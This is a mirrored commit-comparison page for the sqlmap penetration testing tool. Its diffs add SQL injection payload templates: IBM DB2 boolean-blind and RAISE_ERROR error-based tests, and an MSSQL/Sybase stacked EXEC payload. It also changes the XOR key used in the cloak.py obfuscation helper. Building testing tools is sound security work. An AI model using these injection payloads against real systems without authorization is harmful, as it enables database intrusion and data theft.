mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-10 17:59:04 +00:00
Compare commits
22 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
459130196a | ||
|
|
0a8a65bc0b | ||
|
|
5d370f2fa1 | ||
|
|
1296336e18 | ||
|
|
75b3736467 | ||
|
|
282eb7e533 | ||
|
|
f28d82c119 | ||
|
|
74603c5530 | ||
|
|
050700f079 | ||
|
|
31bf1fc6b6 | ||
|
|
d4d83b29f0 | ||
|
|
596fff48ad | ||
|
|
56ff081314 | ||
|
|
69421b4806 | ||
|
|
3910b86853 | ||
|
|
bbdedb39f9 | ||
|
|
d0be782ece | ||
|
|
16c8673e98 | ||
|
|
1dedc36d85 | ||
|
|
c1d46c95ed | ||
|
|
d5fc2c9350 | ||
|
|
c28ad8fcd8 |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -213,6 +213,15 @@ Formats:
|
|||||||
<suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
<suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>2</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>3</ptype>
|
||||||
|
<prefix>%'</prefix>
|
||||||
|
<suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
<level>2</level>
|
<level>2</level>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
|
|||||||
@@ -824,7 +824,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -845,7 +844,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1193,7 +1191,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1214,7 +1211,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1332,6 +1328,44 @@ Tag: <test>
|
|||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 boolean-based blind - ORDER BY clause</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<!-- Works in MySQL, Oracle, etc. -->
|
<!-- Works in MySQL, Oracle, etc. -->
|
||||||
<test>
|
<test>
|
||||||
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
|
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
|
||||||
@@ -1452,7 +1486,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1474,7 +1507,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -404,7 +404,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -425,7 +424,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -446,7 +444,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -467,7 +464,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -488,7 +484,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -509,7 +504,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -672,7 +666,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -689,9 +683,9 @@
|
|||||||
<test>
|
<test>
|
||||||
<title>Firebird OR error-based - WHERE or HAVING clause</title>
|
<title>Firebird OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>4</level>
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -710,7 +704,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -727,9 +721,9 @@
|
|||||||
<test>
|
<test>
|
||||||
<title>MonetDB OR error-based - WHERE or HAVING clause</title>
|
<title>MonetDB OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>4</level>
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -748,7 +742,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,8,9</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -765,9 +759,9 @@
|
|||||||
<test>
|
<test>
|
||||||
<title>Vertica OR error-based - WHERE or HAVING clause</title>
|
<title>Vertica OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>4</level>
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,8,9</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -780,6 +774,45 @@
|
|||||||
<dbms>Vertica</dbms>
|
<dbms>Vertica</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 AND error-based - WHERE or HAVING clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<!--
|
<!--
|
||||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||||
and SAP MaxDB - no known techniques at this time
|
and SAP MaxDB - no known techniques at this time
|
||||||
@@ -1000,7 +1033,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1021,7 +1053,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1062,6 +1093,25 @@
|
|||||||
<dbms>Firebird</dbms>
|
<dbms>Firebird</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 error-based - Parameter replace</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,3</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!-- End of error-based tests - Parameter replace -->
|
<!-- End of error-based tests - Parameter replace -->
|
||||||
|
|
||||||
<!-- Error-based tests - ORDER BY, GROUP BY clause -->
|
<!-- Error-based tests - ORDER BY, GROUP BY clause -->
|
||||||
@@ -1205,7 +1255,6 @@
|
|||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
|
<title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
@@ -1261,7 +1310,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1289,7 +1337,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
|
<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -1302,9 +1350,51 @@
|
|||||||
<dbms>Firebird</dbms>
|
<dbms>Firebird</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 error-based - ORDER BY clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!--
|
<!--
|
||||||
TODO: if possible, add payload for SQLite, Microsoft Access
|
TODO: if possible, add payload for SQLite, Microsoft Access
|
||||||
and SAP MaxDB - no known techniques at this time
|
and SAP MaxDB - no known techniques at this time
|
||||||
-->
|
-->
|
||||||
<!-- End of error-based tests - ORDER BY, GROUP BY clause -->
|
<!-- End of error-based tests - ORDER BY, GROUP BY clause -->
|
||||||
|
|
||||||
|
<!-- Error-based tests - stacking -->
|
||||||
|
<test>
|
||||||
|
<title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>2</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1-8</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>
|
||||||
|
<request>
|
||||||
|
<payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
<dbms>Sybase</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
<!-- End of error-based tests - stacking -->
|
||||||
</root>
|
</root>
|
||||||
|
|||||||
@@ -73,7 +73,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -264,7 +264,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -286,7 +285,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -307,7 +305,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -328,7 +325,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -588,7 +588,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -610,7 +609,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -631,7 +629,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -652,7 +649,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -674,7 +670,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -696,7 +691,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1638,7 +1632,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1936,7 +1929,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -112,6 +112,9 @@ Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
|
|||||||
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Thomas Etrillard, <thomas.etrillard(at)synacktiv.com>
|
||||||
|
* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)
|
||||||
|
|
||||||
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
||||||
* for suggesting good features
|
* for suggesting good features
|
||||||
|
|
||||||
@@ -317,6 +320,9 @@ Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
|
|||||||
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
||||||
* for contributing a Portuguese translation of README.md
|
* for contributing a Portuguese translation of README.md
|
||||||
|
|
||||||
|
Francesco Marano, <francesco.mrn24(at)gmail.com>
|
||||||
|
* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload
|
||||||
|
|
||||||
Ahmad Maulana, <matdhule(at)gmail.com>
|
Ahmad Maulana, <matdhule(at)gmail.com>
|
||||||
* for contributing a tamper script halfversionedmorekeywords.py
|
* for contributing a tamper script halfversionedmorekeywords.py
|
||||||
|
|
||||||
|
|||||||
@@ -19,28 +19,26 @@ from optparse import OptionParser
|
|||||||
|
|
||||||
if sys.version_info >= (3, 0):
|
if sys.version_info >= (3, 0):
|
||||||
xrange = range
|
xrange = range
|
||||||
|
ord = lambda _: _
|
||||||
|
|
||||||
def hideAscii(data):
|
KEY = b"Beeth7hoyooleeF0"
|
||||||
retVal = b""
|
|
||||||
for i in xrange(len(data)):
|
|
||||||
value = data[i] if isinstance(data[i], int) else ord(data[i])
|
|
||||||
retVal += struct.pack('B', value ^ (127 if value < 128 else 0))
|
|
||||||
|
|
||||||
return retVal
|
def xor(message, key):
|
||||||
|
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
||||||
|
|
||||||
def cloak(inputFile=None, data=None):
|
def cloak(inputFile=None, data=None):
|
||||||
if data is None:
|
if data is None:
|
||||||
with open(inputFile, "rb") as f:
|
with open(inputFile, "rb") as f:
|
||||||
data = f.read()
|
data = f.read()
|
||||||
|
|
||||||
return hideAscii(zlib.compress(data))
